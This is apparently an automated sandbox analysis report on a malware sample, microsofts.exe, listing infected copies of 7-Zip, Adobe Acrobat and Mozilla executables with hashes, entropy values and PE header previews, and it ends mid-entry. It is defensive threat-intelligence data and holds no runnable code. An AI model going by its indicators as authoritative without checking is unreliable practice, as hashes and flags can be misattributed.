File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.940555597537707
Encrypted:	false
SSDEEP:	49152:1y53w24gQu3TPZ2psFkiSqwoz8Dmg27RnWGj:1yFQgZqsFki+oz8D527BWG
MD5:	AC3B67E53298F04F90D3BC5B2E9AAA7F
SHA1:	CD1020B7AD20CBA236AE178187CBFBD38AB3D334
SHA-256:	C26E2E9FCC4E1D411CEFEA17DFCAB56D3ABF9CC427299567240CB62ACAEBBC7E
SHA-512:	3B5F31FF61FF1F98A4954A8F77CAB15C695D28F94177A2DF95FDA77971CC0D570966B92137CF195DAE16F71A2465DD3CCF03B52FB34230FB2906E71E1012BA8F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......#!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.809636404857026
Encrypted:	false
SSDEEP:	96:ul+Ji0B5KOw+ideMDkhfrYRUD1BB+MZnBZBTASYPP:ul+JiI5Lw+iwMDkhfrYRUD1BB+MZBZBC
MD5:	C5B661B6E14E77909D5BE7BD2B53B9A5
SHA1:	37B9A97FE7D19C7E1237211B0AFFAE48B7EE2D1E
SHA-256:	E5D6DC879F3236840BD912FFF74C995B7BF4C683B11364920ABF4E2A982F6DBC
SHA-512:	1C10CB7515A2C84D9DBA68A8C9302812019F19237ECF40D117A4968429AC6C14C12392CBE7D69FB8A26A82FA90173ECFA66C049965B36EA1380E061E8BD289E6
Malicious:	false
Reputation:	unknown
Preview:	2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-20 12:41:19-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-20 12:41:19-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-20 12:41:19-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-20 12:41:1

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347857087516311
Encrypted:	false
SSDEEP:	24576:wQVTZu0JLsqjnhMgeiCl7G0nehbGZpbD:PVTZuKDmg27RnWGj
MD5:	3FE71716DC381236318F40AD7E696866
SHA1:	652260788DFD98690BCE715DFDAA0078C08E8C05
SHA-256:	1AB6D4B2F6CAF2E5D7CBE8D6A3FB942A4424BC9BBE18ED407964562FA1F1EA64
SHA-512:	AD80CD475E5EF503192B3708252CE0E8F32EA612725E7D9D57D40A59EF77E42C63C589EE6B7B9BD1790BAE2F2795F71417E1C1B026D55318C84928DAE55F773A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......-.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	5.623149346730315
Encrypted:	false
SSDEEP:	24576:U+gkESfh4CoQsqjnhMgeiCl7G0nehbGZpbD:xgkE+S+Dmg27RnWGj
MD5:	C09B73F5DEEEB72459CA521A3147EDE9
SHA1:	04E140589079740D4CB2F60162407E01BE7A88C1
SHA-256:	E80E295E390DA1DB1E928415D2B98C1D2BF3959D18D5BC84DCEE8A8D692B97D6
SHA-512:	0ADB46675EFAC4BC23500FEE4E6E7AF2D420037F9C87214FCDECE2B42E8ED6CEE69C76B1C9D2CAE80F414E2D0C3E8C008B551DD2271F1DBA2D8527EB9D2397DE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. .......b.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.09669140071657
Encrypted:	false
SSDEEP:	24576:5BpDRmi78gkPXlyo0GtjrDsqjnhMgeiCl7G0nehbGZpbD:7NRmi78gkPX4o0GtjTDmg27RnWGj
MD5:	E42B659439417DAAB5E80AAA50118A1A
SHA1:	C1F8A2E8817939B2D50EC3D0EAD41806E0CA2A5D
SHA-256:	A04565B12FB4DD6DF5B8B63C4A35F82220622AF8FC0DBE0008DE53AAC3755016
SHA-512:	71339CBB9BF4CA0437ACDADE2D2CF4F7F98BC742E9923C92226F81C600AFC2469D2E3248FFA318F0F0C3285D5CE1CF402CE308781EAC871D0C5501E280D22A7F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................J..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.229078094015744
Encrypted:	false
SSDEEP:	24576:QLOS2oTPIXVQsqjnhMgeiCl7G0nehbGZpbD:I/T7Dmg27RnWGj
MD5:	B9DFECF17F11CCADACCC8897BCD28DAD
SHA1:	345DDAC16F0D2881BA5CD6A95E348F3ACB8FAAB1
SHA-256:	C3145412E394D0F7EC166BD13086315086FD761BFA67921F837FBA5B9A99A9B1
SHA-512:	4267C60130EA00D823ADB3C65AD8397334BB30A30CADE4EC2AFA6612DFD6C048821E9438A13DC2B9423BB3D663440ADD8B2455B1B786D6A4AD51154A3A0D5383
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.......................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	5.031207541927304
Encrypted:	false
SSDEEP:	12288:51KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:51KsqjnhMgeiCl7G0nehbGZpbD
MD5:	B300416E2C1352B794A54657BF550D8E
SHA1:	F57D665AA80C677275A122CE0B762301EFF6E8BD
SHA-256:	87280467A6B6F9F1C6ABCE5AADB676C0E33EF6A07EE223D0B1B86F5A6BBE501D
SHA-512:	4C332E70456A5BB9841AF031DF1520E5C44961E3B95D14C3A9E663938A09AFD1618601CFE993F3949DBA700BDB73AD2C3253B0DA3087330B473D662A6177CBAA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................F.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.712042625439121
Encrypted:	false
SSDEEP:	12288:yRudz1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yAdz1sqjnhMgeiCl7G0nehbGZpbD
MD5:	7F1C10B9C07907C7866027586DCA6A41
SHA1:	C28E9340DC8D64E26414204BF2156CDE32A805A5
SHA-256:	C02D706A6DBB2078F454CC42952FE7F0ACB68F5E23F921C1C45195C725F3AA3A
SHA-512:	BEAAC343E8361A1AAFF34F65417AD18514DC97806C822D4188B5728D56ADD444B142EB52976D825F3A4C5B1A9CB33719D6C0920D476F41CD567FF955279AED1C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................[..... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1457664
Entropy (8bit):	5.08218120143234
Encrypted:	false
SSDEEP:	12288:GvJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EsqjnhMgeiCl7G0nehbGZpbD
MD5:	6CF89A454200948BFFF63A4D816BF6DB
SHA1:	A12D2112FD91443ECCA9D828309DFC68191FD7DD
SHA-256:	980776EF98D48BE68A48B07BA90CF626739F099CF7EC3B509EA2617FC0868BC1
SHA-512:	1A0C3DEA32F88EB1AD88CEB07799FBC01CC0B6D907C53AC9EDB6FFB77A2CF8B84018EBC876C813D878580D29A0ECCC533DFAA428A492D7DDB37060ED9D856586
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@....................................$..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1461248
Entropy (8bit):	5.468646412702578
Encrypted:	false
SSDEEP:	24576:L5zhM1XSE8sqjnhMgeiCl7G0nehbGZpbD:fMspDmg27RnWGj
MD5:	058F2DCD0CDE7696963A8A6092ED3CB3
SHA1:	FD8434BD52F9D1007FF20DE069978CF83A5F7C4A
SHA-256:	8E356D31BA2C5F9E7C4D0EBA1F6EE8EA62C9BB9E3B98598AA6E1C64FA5EB5877
SHA-512:	204DC33740C2293BD9E148F5EEBE18EA317BC5CE588ECCE34B8910921964AE1351A909C1D24E2E505F28C03BADB6D4BC70AE02D97003228018E9BAD9A798D02C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499798361315387
Encrypted:	false
SSDEEP:	49152:xtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755fDmg27RN:xjEIa4HIEWOc5FD527BWG
MD5:	B12214501C1563A28E38315E499BD2D3
SHA1:	D41BE49C1551B0B5D2614EA391A2839C1D1BCD73
SHA-256:	8B97E55EBAE151C5BD97706975472226327AB3EBD54545D3980C31B7978392DC
SHA-512:	F7C74B70F864A27FC80695B6B9C4A985533284630C3B7A37BE44561DFC92AE877735D1429F35BB5B378FE7D0AB04902C60DFE860FD4B90F67CA9C8E11B9CB4F9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......%@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.9993673346383565
Encrypted:	true
SSDEEP:	1572864:IQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:HXhwMhe6AABPiQwF6xQ22R
MD5:	58507ACE99C1CF269C58D66BC0182DFC
SHA1:	F730B6BDC92AA56760EB7254A7601697CC77F408
SHA-256:	B57D3C28E3A5391B24DECD733A5E71ED7278AF9333B4F2D7AF2B573CDA571E35
SHA-512:	1078851B03E4E787BF1C491EB7352C651565035B3039BAB5DBE8ED78EEEFEF3CCCCF762293BCC7533A49152BA9AEC0373CB629D8DC603B8E3D4646954C5E927B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......c.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1180160
Entropy (8bit):	5.084827444887157
Encrypted:	false
SSDEEP:	12288:9WZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9MsqjnhMgeiCl7G0nehbGZpbD
MD5:	9A6D4BC45A9F6DFD7714FAD1EF9FE074
SHA1:	D130A832E65CE6143C39CFA6B2722ECDE9AE1BC2
SHA-256:	A5C3592F028E37C3AC79F3B094714854C925B81938FF1459111EDC958499AE86
SHA-512:	18C2334C39DF74DC471A8DC6F02BE6F89DD129C613C057B3EC356EE4C021E9248C45C68917A7D0F81B6455CFEE466D0806A98B495655A0150B9CD7E60437393C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.386712583520985
Encrypted:	false
SSDEEP:	49152:LDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXj:knN9KfxLk6GEQTX5UKzNDmD527BWG
MD5:	B0AC0ECCA2541C454426A4EDB46CC3E7
SHA1:	26BF9B47CE605BE659ECAD9EF7751ABD3A6A72A9
SHA-256:	91BCA2EA1071355017C273D9737CE94C2B0D2B85D7B15BBE19C5C15087795B4D
SHA-512:	BEDB7859A1656FB9E278D0B7A863439DA8F636622FFC4C4C9D574DF52FC544651715169CEBCBBB48163A992788A6C7DBFA3431593DDE3084AEF831D7C00698FA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....n<_... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1157120
Entropy (8bit):	5.041501358474866
Encrypted:	false
SSDEEP:	12288:wEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wEsqjnhMgeiCl7G0nehbGZpbD
MD5:	FE18EA2D42A49F72461E0F11A90191BD
SHA1:	E80ADA82A8527D73107F24762F342CBE5F3DACF0
SHA-256:	6FC7068B03DDC08527128E4BFE5FEBE774DD74B9BE19E1DF69501B0DD35B97A6
SHA-512:	8E4D4CD405E888B8A5B08BF2DBC9CF6B37FA34BD20734E7ECC74D20A8554A072A17D8130D8A5DB7B753FE7650CBBB4BF4D329381A2ED8B36A80C0E4D14834983
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.596681799257422
Encrypted:	false
SSDEEP:	98304:/b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKvD527BWG:znPgTHIwZoRBk9DdhSUEVIXgKvVQBWG
MD5:	E4CBC56AAA5B1B3AF2C97059AD909522
SHA1:	BA8F174C7114150582BFB9DD2FFC8F2F0E3778D7
SHA-256:	9A9BC3CD01FECD5A0333071EC8AA6CF8E2F185690FB0CA0E07613AF1AEEBFE71
SHA-512:	D48823B08E0C78EA750CB0AD043E13AA0780A328E27E683D7364D096A3781AE8B4FC60F5E554988B929F80228C5856230D0C225B6EC7D428683F5C93CAD5488F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................v.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1322496
Entropy (8bit):	5.281837006559591
Encrypted:	false
SSDEEP:	24576:fg5FvCPusrsqjnhMgeiCl7G0nehbGZpbD:Ift8Dmg27RnWGj
MD5:	2B9AFC058C280627B689C2CC4BC8CC0F
SHA1:	1D07446FB1D45EEE62D13EAE6CB84D4DDE9849DB
SHA-256:	4040CFD3FED655326B0BA27C27181E0D26CE2A2783F41DE2FC97916D70B424F4
SHA-512:	6A84882C4DDEFEA1D5853E7D2EC2D842CED7C711F25745854076B817F399FF4ED9ACC1680AFE6F52059E9153863319601CCF0E515A4FBDC766545845DF9B6715
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p........... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.208920611633696
Encrypted:	false
SSDEEP:	24576:kjKTIsAjFuvtIfmFthMaT5U8aChaeu9sqjnhMgeiCl7G0nehbGZpbD:kjIMmPh7TT790Dmg27RnWGj
MD5:	4ED588D7D725F44AC66C676251D39337
SHA1:	CD38E07E258A4A0F5AB911CC4C6FE0009F3F8D2C
SHA-256:	5088155B955F8D706D256172A1707ECE08D74620344F1E69D2881B36C5D50491
SHA-512:	A5C2EEFFC97AECBD31CA2442BFE10033F808A6C5B150D1B6FE098B5AA88DC3AFE77BFDDBD809AEDC8EA27D3ED570E0062C0E376BD476A6BEB397EFE4D402DC27
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....{:.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515520
Entropy (8bit):	5.411789219854786
Encrypted:	false
SSDEEP:	24576:LGqVwCto1Gm5WgpsqjnhMgeiCl7G0nehbGZpbD:aZ1GmU2Dmg27RnWGj
MD5:	581AA8EEC0B0F29179127F89E8DC4F4B
SHA1:	4EB5CEF0A0C74C578FC9B89DA1315C8909012B61
SHA-256:	F9732AEE2A529AB96D9BB034CF2FFF8F9AB988DF9D7FBB328B89F5D96F111C0C
SHA-512:	45D4B51D815FFBC147C8F148E9EF34A26F3414A5F6A14657029FAC17E7843F9BF4E373414CC36EFD7C6129B90E7318AFAF4DC5A9B4FF5416BFAC37ABBB7A5F74
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................]D.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	5.157423483106466
Encrypted:	false
SSDEEP:	12288:VWBWdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VWBWdsqjnhMgeiCl7G0nehbGZpbD
MD5:	33DD31E978745E793A0553C36E38B50A
SHA1:	F5031504D11C5B0368C844D5F928FD0040BF0556
SHA-256:	04D1307CDFF4F4508E4F923205E609E5B556366D363CE37CF5520BCAAF663782
SHA-512:	406E53F5CE9F866C9D10B4FC5884F414729BEBABF6489F9FE5B78ADB2D6332873EE5961E69D8E7EAA31504364F4AC28B4F8C88DD0669B9398B3EB99D61655417
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`........... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.228507533491244
Encrypted:	false
SSDEEP:	24576:mf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa02sqjnhMgeiCl7G0nehbGZpbD:m+GtCi27mVTyT+a06Dmg27RnWGj
MD5:	37682A04F3587EBBB10F8E3119428F37
SHA1:	3B7D48E70B0721550BCB119DCF078575F691315C
SHA-256:	6E1A6135E95C464005D1EE94BEB40DFF84F2C8E254728D9C298DBFDED5342AE9
